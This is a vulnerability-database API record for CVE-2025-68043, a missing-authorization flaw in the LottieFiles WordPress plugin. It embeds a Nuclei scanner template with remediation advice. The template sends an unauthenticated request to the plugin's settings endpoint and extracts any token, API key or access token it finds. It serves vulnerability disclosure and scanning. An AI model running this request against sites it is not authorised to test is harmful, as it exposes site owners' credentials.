{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2025-68043/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2025-68043/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2025-68043/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2025-68043/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2025-68043/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2025-68043/enrichment"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2025-68043"
    },
    "vulnerability": {
      "href": "/api/v1/vulnerability/cve-2025-68043"
    }
  },
  "enrichments": {
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2025/CVE-2025-68043.yaml",
      "nuclei_template_severity": "high",
      "nuclei_template_yaml": "id: CVE-2025-68043\n\ninfo:\n  name: LottieFiles WordPress Plugin <= 3.0.0 - Missing Authorization\n  author: pussycat0x\n  severity: high\n  description: |\n    LottieFiles LottieFiles <= 3.0.0 contains a broken access control vulnerability caused by incorrectly configured access control security levels, letting attackers exploit missing authorization, exploit requires no special privileges.\n  impact: |\n    Attackers can bypass authorization to access or modify restricted resources, potentially leading to data exposure or unauthorized actions.\n  remediation: |\n    Update to the latest version beyond 3.0.0.\n  reference:\n    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/lottiefiles/lottiefiles-300-missing-authorization\n    - https://patchstack.com/database/Wordpress/Plugin/lottiefiles/vulnerability/wordpress-lottiefiles-plugin-3-0-0-broken-access-control-vulnerability?_s_id=cve\n    - https://plugins.svn.wordpress.org/lottiefiles/\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\n    cvss-score: 7.3\n    cwe-id: CWE-862\n    cve-id: CVE-2025-68043\n    epss-score: 0.00637\n    epss-percentile: 0.5069\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: lottiefiles\n    product: lottiefiles\n    framework: wordpress\n  tags: cve,cve2025,wordpress,wp-plugin,lottiefiles,vkev\n\nhttp:\n  - raw:\n      - |\n        GET /wp-json/lottiefiles/v1/settings/ HTTP/1.1\n        Host: {{Hostname}}\n        Accept: application/json\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"is_block_logged_in\"\n\n      - type: word\n        part: header\n        words:\n          - \"application/json\"\n\n      - type: status\n        status:\n          - 200\n\n    extractors:\n      - type: regex\n        part: body\n        group: 1\n        regex:\n          - '\"token\"\\s*:\\s*\"([^\"]+)\"'\n          - '\"apiKey\"\\s*:\\s*\"([^\"]+)\"'\n          - '\"accessToken\"\\s*:\\s*\"([^\"]+)\"'\n# digest: 490a004630440220069d1112c15134123ce818c9cfa64d5e2a845e5b51cb0d996addc036ba94d0b202206756f7a24cc240abf36e2e3cacb38ebddc9de84bd1f3f8ca25f0185eb73a2778:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2025-68043"
}